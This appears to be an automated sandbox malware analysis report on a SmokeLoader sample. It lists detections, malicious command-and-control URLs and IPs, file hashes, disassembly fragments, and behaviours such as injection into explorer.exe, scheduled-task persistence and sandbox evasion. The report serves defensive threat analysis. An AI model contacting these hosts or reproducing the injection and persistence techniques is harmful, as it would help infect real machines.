      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
      File Deletion
      Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1532550 Sample: FyDBXJE74v.exe Startdate: 13/10/2024 Architecture: WINDOWS Score: 100 21 nwgrus.ru 2->21 27 Multi AV Scanner detection for domain / URL 2->27 29 Suricata IDS alerts for network traffic 2->29 31 Found malware configuration 2->31 33 7 other signatures 2->33 7 FyDBXJE74v.exe 2->7         started        10 wsbgrgh 2->10         started        signatures3 process4 signatures5 35 Detected unpacking (changes PE section rights) 7->35 37 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 7->37 39 Maps a DLL or memory area into another process 7->39 49 3 other signatures 7->49 12 explorer.exe 59 3 7->12 injected 41 Antivirus detection for dropped file 10->41 43 Multi AV Scanner detection for dropped file 10->43 45 Machine Learning detection for dropped file 10->45 47 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 10->47 process6 dnsIp7 23 nwgrus.ru 78.89.199.216, 49736, 49737, 49738 WATANIYATELECOM-ASKW Kuwait 12->23 25 109.175.29.39, 50045, 50046, 50047 BIHNETBIHNETAutonomusSystemBA Bosnia and Herzegowina 12->25 17 C:\Users\user\AppData\Roaming\wsbgrgh, PE32 12->17 dropped 19 C:\Users\user\...\wsbgrgh:Zone.Identifier, ASCII 12->19 dropped 51 System process connects to network (likely due to code injection or exploit) 12->51 53 Benign windows process drops PE files 12->53 55 Deletes itself after installation 12->55 57 Hides that the sample has been downloaded from the Internet (zone.identifier) 12->57 file8 signatures9

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      FyDBXJE74v.exe39%ReversingLabsWin32.Ransomware.LockbitCrypt
      FyDBXJE74v.exe41%VirustotalBrowse
      FyDBXJE74v.exe100%AviraHEUR/AGEN.1312571
      FyDBXJE74v.exe100%Joe Sandbox ML
      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Roaming\wsbgrgh100%AviraHEUR/AGEN.1312571
      C:\Users\user\AppData\Roaming\wsbgrgh100%Joe Sandbox ML
      C:\Users\user\AppData\Roaming\wsbgrgh39%ReversingLabsWin32.Ransomware.LockbitCrypt
      C:\Users\user\AppData\Roaming\wsbgrgh41%VirustotalBrowse
      No Antivirus matches
      SourceDetectionScannerLabelLink
      nwgrus.ru12%VirustotalBrowse
      SourceDetectionScannerLabelLink
      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV0%URL Reputationsafe
      https://powerpoint.office.comcember0%URL Reputationsafe
      https://powerpoint.office.comcember0%URL Reputationsafe
      https://api.msn.com:443/v1/news/Feed/Windows?0%URL Reputationsafe
      https://excel.office.com0%URL Reputationsafe
      https://excel.office.com0%URL Reputationsafe
      http://schemas.micro0%URL Reputationsafe
      https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew0%URL Reputationsafe
      https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe0%URL Reputationsafe
      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark0%URL Reputationsafe
      https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg0%URL Reputationsafe
      https://word.office.com0%URL Reputationsafe
      https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings0%URL Reputationsafe
      https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew0%URL Reputationsafe
      https://aka.ms/Vh5j3k0%URL Reputationsafe
      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu0%URL Reputationsafe
      https://android.notify.windows.com/iOS0%URL Reputationsafe
      https://api.msn.com/0%URL Reputationsafe
      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark0%URL Reputationsafe
      http://unicea.ws/tmp/index.php0%VirustotalBrowse
      https://aka.ms/odirmr0%VirustotalBrowse
      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY0%VirustotalBrowse
      https://simpleflying.com/how-do-you-become-an-air-traffic-controller/0%VirustotalBrowse
      http://nwgrus.ru/tmp/index.php17%VirustotalBrowse
      https://api.msn.com/q0%VirustotalBrowse
      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark0%VirustotalBrowse
      https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg0%VirustotalBrowse
      http://www.autoitscript.com/autoit3/J0%VirustotalBrowse
      https://wns.windows.com/L0%VirustotalBrowse
      http://tech-servers.in.net/tmp/index.php2%VirustotalBrowse
      https://api.msn.com/v1/news/Feed/Windows?&0%VirustotalBrowse
      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu0%VirustotalBrowse
      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark0%VirustotalBrowse
      https://www.rd.com/list/polite-habits-campers-dislike/0%VirustotalBrowse
      https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img0%VirustotalBrowse
      https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe0%VirustotalBrowse
      https://www.msn.com:443/en-us/feed0%VirustotalBrowse
      https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg0%VirustotalBrowse
      NameIPActiveMaliciousAntivirus DetectionReputation
      nwgrus.ru
      78.89.199.216
      truetrueunknown
      NameMaliciousAntivirus DetectionReputation
      http://unicea.ws/tmp/index.phptrueunknown
      http://nwgrus.ru/tmp/index.phptrueunknown
      http://tech-servers.in.net/tmp/index.phptrueunknown
      NameSourceMaliciousAntivirus DetectionReputation
      https://aka.ms/odirmrexplorer.exe, 00000001.00000000.1811826279.00000000079FB000.00000004.00000001.00020000.00000000.sdmpfalseunknown
      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DVexplorer.exe, 00000001.00000000.1811826279.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      unknown
      https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-clexplorer.exe, 00000001.00000000.1811826279.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
        unknown
        https://powerpoint.office.comcemberexplorer.exe, 00000001.00000000.1817769724.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        • URL Reputation: safe
        unknown
        https://api.msn.com:443/v1/news/Feed/Windows?explorer.exe, 00000001.00000000.1811826279.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1813742183.00000000097D4000.00000004.00000001.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        unknown
        https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-explorer.exe, 00000001.00000000.1811826279.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
          unknown
          https://excel.office.comexplorer.exe, 00000001.00000000.1817769724.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          • URL Reputation: safe
          unknown
          http://schemas.microexplorer.exe, 00000001.00000000.1814735549.0000000009B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1813184602.0000000008720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1812705551.0000000007F40000.00000002.00000001.00040000.00000000.sdmpfalse
          • URL Reputation: safe
          unknown
          https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-weexplorer.exe, 00000001.00000000.1811826279.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
            unknown
            https://simpleflying.com/how-do-you-become-an-air-traffic-controller/explorer.exe, 00000001.00000000.1811826279.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalseunknown
            https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUYexplorer.exe, 00000001.00000000.1811826279.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalseunknown
            https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000001.00000000.1811826279.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-darkexplorer.exe, 00000001.00000000.1811826279.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalseunknown
            https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-miexplorer.exe, 00000001.00000000.1811826279.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
              unknown
              https://api.msn.com/qexplorer.exe, 00000001.00000000.1813742183.00000000097D4000.00000004.00000001.00020000.00000000.sdmpfalseunknown
              https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&ocexplorer.exe, 00000001.00000000.1811826279.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                unknown
                https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exeexplorer.exe, 00000001.00000000.1817769724.000000000C893000.00000004.00000001.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1explorer.exe, 00000001.00000000.1811826279.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                  unknown
                  https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svgexplorer.exe, 00000001.00000000.1811826279.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalseunknown
                  https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-darkexplorer.exe, 00000001.00000000.1811826279.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-Aexplorer.exe, 00000001.00000000.1811826279.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1811826279.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                    unknown
                    https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svgexplorer.exe, 00000001.00000000.1811826279.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000001.00000000.1817769724.000000000C964000.00000004.00000001.00020000.00000000.sdmpfalseunknown
                    https://wns.windows.com/Lexplorer.exe, 00000001.00000000.1817769724.000000000C557000.00000004.00000001.00020000.00000000.sdmpfalseunknown
                    https://word.office.comexplorer.exe, 00000001.00000000.1817769724.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earningsexplorer.exe, 00000001.00000000.1811826279.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZuexplorer.exe, 00000001.00000000.1811826279.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalseunknown
                    https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headereventexplorer.exe, 00000001.00000000.1811826279.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                      unknown
                      https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-winexplorer.exe, 00000001.00000000.1811826279.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                        unknown
                        https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000001.00000000.1811826279.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-explorer.exe, 00000001.00000000.1811826279.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                          unknown
                          https://aka.ms/Vh5j3kexplorer.exe, 00000001.00000000.1811826279.00000000079FB000.00000004.00000001.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeuexplorer.exe, 00000001.00000000.1811826279.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://api.msn.com/v1/news/Feed/Windows?&explorer.exe, 00000001.00000000.1813742183.00000000096DF000.00000004.00000001.00020000.00000000.sdmpfalseunknown
                          https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svgexplorer.exe, 00000001.00000000.1811826279.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalseunknown
                          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-darkexplorer.exe, 00000001.00000000.1811826279.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalseunknown
                          https://www.rd.com/list/polite-habits-campers-dislike/explorer.exe, 00000001.00000000.1811826279.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalseunknown
                          https://android.notify.windows.com/iOSexplorer.exe, 00000001.00000000.1817769724.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/arexplorer.exe, 00000001.00000000.1811826279.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                            unknown
                            https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.imgexplorer.exe, 00000001.00000000.1811826279.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalseunknown
                            https://api.msn.com/explorer.exe, 00000001.00000000.1813742183.00000000097D4000.00000004.00000001.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-dexplorer.exe, 00000001.00000000.1811826279.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                              unknown
                              https://outlook.com_explorer.exe, 00000001.00000000.1817769724.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                                unknown
                                https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-darkexplorer.exe, 00000001.00000000.1811826279.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                https://www.msn.com:443/en-us/feedexplorer.exe, 00000001.00000000.1811826279.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalseunknown
                                https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppeexplorer.exe, 00000001.00000000.1811826279.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalseunknown
                                https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-atexplorer.exe, 00000001.00000000.1811826279.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                  unknown
                                  https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-ofexplorer.exe, 00000001.00000000.1811826279.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                    unknown
                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs
                                    IPDomainCountryFlagASNASN NameMalicious
                                    109.175.29.39
                                    unknownBosnia and Herzegowina
                                    9146BIHNETBIHNETAutonomusSystemBAtrue
                                    78.89.199.216
                                    nwgrus.ruKuwait
                                    29357WATANIYATELECOM-ASKWtrue
                                    Joe Sandbox version:41.0.0 Charoite
                                    Analysis ID:1532550
                                    Start date and time:2024-10-13 17:01:06 +02:00
                                    Joe Sandbox product:CloudBasic
                                    Overall analysis duration:0h 8m 3s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                    Number of analysed new started processes analysed:6
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:1
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Sample name:FyDBXJE74v.exe
                                    renamed because original name is a hash value
                                    Original Sample Name:497859eed941e073a43e8291908e6494.exe
                                    Detection:MAL
                                    Classification:mal100.troj.evad.winEXE@2/2@4/2
                                    EGA Information:
                                    • Successful, ratio: 100%
                                    HCA Information:
                                    • Successful, ratio: 100%
                                    • Number of executed functions: 36
                                    • Number of non-executed functions: 13
                                    Cookbook Comments:
                                    • Found application associated with file extension: .exe
                                    • Override analysis time to 240000 for current running targets taking high CPU consumption
                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                    • Not all processes where analyzed, report is missing behavior information
                                    • Report size getting too big, too many NtEnumerateKey calls found.
                                    • Report size getting too big, too many NtOpenKey calls found.
                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                    TimeTypeDescription
                                    11:02:29API Interceptor469086x Sleep call for process: explorer.exe modified
                                    16:02:28Task SchedulerRun new task: Firefox Default Browser Agent 07E0028B089452B1 path: C:\Users\user\AppData\Roaming\wsbgrgh
                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    109.175.29.39bCnarg2O62.exeGet hashmaliciousSmokeLoaderBrowse
                                    • nwgrus.ru/tmp/index.php
                                    veEGy9FijY.exeGet hashmaliciousSmokeLoaderBrowse
                                    • nwgrus.ru/tmp/index.php
                                    Cjmw6m68OV.exeGet hashmaliciousSmokeLoaderBrowse
                                    • nwgrus.ru/tmp/index.php
                                    82HD7ZgYPA.exeGet hashmaliciousLummaC, Go Injector, LummaC Stealer, SmokeLoaderBrowse
                                    • 100xmargin.com/tmp/index.php
                                    HliN0ju7OT.exeGet hashmaliciousLummaC, Go Injector, SmokeLoaderBrowse
                                    • yosoborno.com/tmp/
                                    file.exeGet hashmaliciousBabuk, DjvuBrowse
                                    • cajgtus.com/test1/get.php?pid=63423FF445583FE5A9A41B7CFEC3D9C4
                                    file.exeGet hashmaliciousBabuk, DjvuBrowse
                                    • cajgtus.com/test1/get.php?pid=F8AFCDC4E800A3319FFB343E83099637
                                    xvJv1BpknZ.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                                    • dbfhns.in/tmp/index.php
                                    file.exeGet hashmaliciousBabuk, Djvu, PrivateLoaderBrowse
                                    • cajgtus.com/lancer/get.php?pid=903E7F261711F85395E5CEFBF4173C54
                                    SecuriteInfo.com.Win32.RansomX-gen.4067.126.exeGet hashmaliciousLummaC, Amadey, Glupteba, LummaC Stealer, Mars Stealer, RedLine, SmokeLoaderBrowse
                                    • trmpc.com/check/index.php
                                    78.89.199.216fTKQwp8fRa.exeGet hashmaliciousSmokeLoaderBrowse
                                    • nwgrus.ru/tmp/index.php
                                    k8JAXb3Lhs.exeGet hashmaliciousSmokeLoaderBrowse
                                    • nwgrus.ru/tmp/index.php
                                    file.exeGet hashmaliciousSmokeLoaderBrowse
                                    • nwgrus.ru/tmp/index.php
                                    kjR9pmEPvT.exeGet hashmaliciousLummaC, Go Injector, LummaC Stealer, SmokeLoaderBrowse
                                    • 100xmargin.com/tmp/index.php
                                    45oPcWSKOp.exeGet hashmaliciousLummaC, Go Injector, LummaC Stealer, SmokeLoaderBrowse
                                    • mzxn.ru/tmp/index.php
                                    FpiUD4nYpj.exeGet hashmaliciousLummaC, AsyncRAT, Go Injector, LummaC Stealer, SmokeLoader, VenomRATBrowse
                                    • mzxn.ru/tmp/index.php
                                    TfsbrHNaOX.exeGet hashmaliciousDjvuBrowse
                                    • cajgtus.com/lancer/get.php?pid=3C8DAB0A318E3BBE55D6418C454BF200
                                    Nlwkg1ycJ4.exeGet hashmaliciousBabuk, DjvuBrowse
                                    • cajgtus.com/lancer/get.php?pid=63423FF445583FE5A9A41B7CFEC3D9C4
                                    LavMqtzZNw.exeGet hashmaliciousLummaC, SmokeLoaderBrowse
                                    • movlat.com/tmp/
                                    1Vkf7silOj.exeGet hashmaliciousLummaC, Amadey, Mars Stealer, PureLog Stealer, RedLine, SmokeLoader, StealcBrowse
                                    • movlat.com/tmp/
                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    nwgrus.rufile.exeGet hashmaliciousSmokeLoaderBrowse
                                    • 63.143.98.185
                                    fTKQwp8fRa.exeGet hashmaliciousSmokeLoaderBrowse
                                    • 78.89.199.216
                                    LgigaSKsL6.exeGet hashmaliciousSmokeLoaderBrowse
                                    • 190.224.203.37
                                    file.exeGet hashmaliciousSmokeLoaderBrowse
                                    • 190.147.128.172
                                    mGFoU1INUk.exeGet hashmaliciousSmokeLoaderBrowse
                                    • 119.204.11.2
                                    uSIvID4Y7U.exeGet hashmaliciousSmokeLoaderBrowse
                                    • 190.224.203.37
                                    wBgwzVbZuV.exeGet hashmaliciousSmokeLoaderBrowse
                                    • 116.58.10.60
                                    bQ7r31F9Ow.exeGet hashmaliciousSmokeLoaderBrowse
                                    • 190.147.2.86
                                    LbzlI5idGJ.exeGet hashmaliciousSmokeLoaderBrowse
                                    • 187.211.161.52
                                    PGUs9p74si.exeGet hashmaliciousSmokeLoaderBrowse
                                    • 92.36.226.66
                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    WATANIYATELECOM-ASKWfTKQwp8fRa.exeGet hashmaliciousSmokeLoaderBrowse
                                    • 78.89.199.216
                                    na.elfGet hashmaliciousUnknownBrowse
                                    • 78.89.197.195
                                    na.elfGet hashmaliciousUnknownBrowse
                                    • 78.89.197.195
                                    na.elfGet hashmaliciousUnknownBrowse
                                    • 78.89.197.195
                                    na.elfGet hashmaliciousUnknownBrowse
                                    • 78.89.197.195
                                    na.elfGet hashmaliciousUnknownBrowse
                                    • 78.89.197.195
                                    na.elfGet hashmaliciousUnknownBrowse
                                    • 78.89.197.195
                                    z3hir.arm.elfGet hashmaliciousMiraiBrowse
                                    • 78.89.177.126
                                    k8JAXb3Lhs.exeGet hashmaliciousSmokeLoaderBrowse
                                    • 78.89.199.216
                                    file.exeGet hashmaliciousSmokeLoaderBrowse
                                    • 78.89.199.216
                                    BIHNETBIHNETAutonomusSystemBAPGUs9p74si.exeGet hashmaliciousSmokeLoaderBrowse
                                    • 92.36.226.66
                                    na.elfGet hashmaliciousMiraiBrowse
                                    • 92.36.229.146
                                    bCnarg2O62.exeGet hashmaliciousSmokeLoaderBrowse
                                    • 109.175.29.39
                                    UV2uLdRZix.exeGet hashmaliciousSmokeLoaderBrowse
                                    • 185.12.79.25
                                    veEGy9FijY.exeGet hashmaliciousSmokeLoaderBrowse
                                    • 109.175.29.39
                                    http://iss.fmpvs.gov.ba/Home/ChangeCulture?lang=hr&returnUrl=https://aaqkada0nzi2n2jhlthmzditndjinc1hz.hanskiin7.com/782340117681873687911955xbixgen-pgx-783419043035-ifxyeonkim-isxskyline-holt.comsf-1sf_rand()Get hashmaliciousHTMLPhisherBrowse
                                    • 109.175.10.156
                                    Cjmw6m68OV.exeGet hashmaliciousSmokeLoaderBrowse
                                    • 109.175.29.39
                                    O9M84hUenb.elfGet hashmaliciousMirai, OkiruBrowse
                                    • 92.36.229.158
                                    h8jGj6Qe78.exeGet hashmaliciousCryptOne, SmokeLoader, Stealc, VidarBrowse
                                    • 92.36.226.66
                                    82HD7ZgYPA.exeGet hashmaliciousLummaC, Go Injector, LummaC Stealer, SmokeLoaderBrowse
                                    • 109.175.29.39
                                    No context
                                    No context
                                    Process:C:\Windows\explorer.exe
                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                    Category:dropped
                                    Size (bytes):296960
                                    Entropy (8bit):5.617071692398502
                                    Encrypted:false
                                    SSDEEP:3072:ohQBX24upVVQN58sfUAJ5IpCyxF9DavUjZXFUCIqzpZAqa8i:oqFseN58u8/4OXFVIqzpZAqaR
                                    MD5:497859EED941E073A43E8291908E6494
                                    SHA1:8136E8E148DEEB6C9D18F8300F47E7B3A43B4290
                                    SHA-256:8484619768F32FB9368CC46BC15A16CF99C98E95A2A605068ADF5DD71090E0C7
                                    SHA-512:5E5AF6D5D1802AAD3160E8A139134C5CC39D6D3B10AE0ACBE686A1FEF9944D36CBA20081781ABFEAD68F3B6E37DE4182178FA293C16B6994473A6D869C9D7A06
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    • Antivirus: ReversingLabs, Detection: 39%
                                    • Antivirus: Virustotal, Detection: 41%, Browse
                                    Reputation:low
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9..K}...}...}...c.x.f...c.i.m...c...7...Z...z...}.......c.v.|...c.h.|...c.m.|...Rich}...........PE..L...|OXe.................T...ls..............p....@...........................t.....Tf......................................$...P.... r..............................................................................p...............................text...oS.......T.................. ..`.rdata..& ...p..."...X..............@..@.data...|.o..........z..............@....kibojis.D....q..8..................@....xeto....(....q..(..................@....rsrc........ r.....................@..@................................................................................................................................................................................................................................................................................................
                                    Process:C:\Windows\explorer.exe
                                    File Type:ASCII text, with CRLF line terminators
                                    Category:modified
                                    Size (bytes):26
                                    Entropy (8bit):3.95006375643621
                                    Encrypted:false
                                    SSDEEP:3:ggPYV:rPYV
                                    MD5:187F488E27DB4AF347237FE461A079AD
                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                    Malicious:true
                                    Reputation:high, very likely benign file
                                    Preview:[ZoneTransfer]....ZoneId=0
                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                    Entropy (8bit):5.617071692398502
                                    TrID:
                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                    • DOS Executable Generic (2002/1) 0.02%
                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                    File name:FyDBXJE74v.exe
                                    File size:296'960 bytes
                                    MD5:497859eed941e073a43e8291908e6494
                                    SHA1:8136e8e148deeb6c9d18f8300f47e7b3a43b4290
                                    SHA256:8484619768f32fb9368cc46bc15a16cf99c98e95a2a605068adf5dd71090e0c7
                                    SHA512:5e5af6d5d1802aad3160e8a139134c5cc39d6d3b10ae0acbe686a1fef9944d36cba20081781abfead68f3b6e37de4182178fa293c16b6994473a6d869c9d7a06
                                    SSDEEP:3072:ohQBX24upVVQN58sfUAJ5IpCyxF9DavUjZXFUCIqzpZAqa8i:oqFseN58u8/4OXFVIqzpZAqaR
                                    TLSH:D754D78252E56C03EFB64B328E39D9D8262EFD724E3572DEB1047A0F147B1A5E513B12
                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9..K}...}...}...c.x.f...c.i.m...c...7...Z...z...}.......c.v.|...c.h.|...c.m.|...Rich}...........PE..L...|OXe.................T.
                                    Icon Hash:738733b18b838be4
                                    Entrypoint:0x4018e4
                                    Entrypoint Section:.text
                                    Digitally signed:false
                                    Imagebase:0x400000
                                    Subsystem:windows gui
                                    Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                    DLL Characteristics:TERMINAL_SERVER_AWARE
                                    Time Stamp:0x65584F7C [Sat Nov 18 05:45:32 2023 UTC]
                                    TLS Callbacks:
                                    CLR (.Net) Version:
                                    OS Version Major:5
                                    OS Version Minor:0
                                    File Version Major:5
                                    File Version Minor:0
                                    Subsystem Version Major:5
                                    Subsystem Version Minor:0
                                    Import Hash:67def8961050d10da5ff74312b7f0aec
                                    Instruction
                                    call 00007FD9EC80A790h
                                    jmp 00007FD9EC80708Dh
                                    mov edi, edi
                                    push ebp
                                    mov ebp, esp
                                    sub esp, 00000328h
                                    mov dword ptr [0041B3D0h], eax
                                    mov dword ptr [0041B3CCh], ecx
                                    mov dword ptr [0041B3C8h], edx
                                    mov dword ptr [0041B3C4h], ebx
                                    mov dword ptr [0041B3C0h], esi
                                    mov dword ptr [0041B3BCh], edi
                                    mov word ptr [0041B3E8h], ss
                                    mov word ptr [0041B3DCh], cs
                                    mov word ptr [0041B3B8h], ds
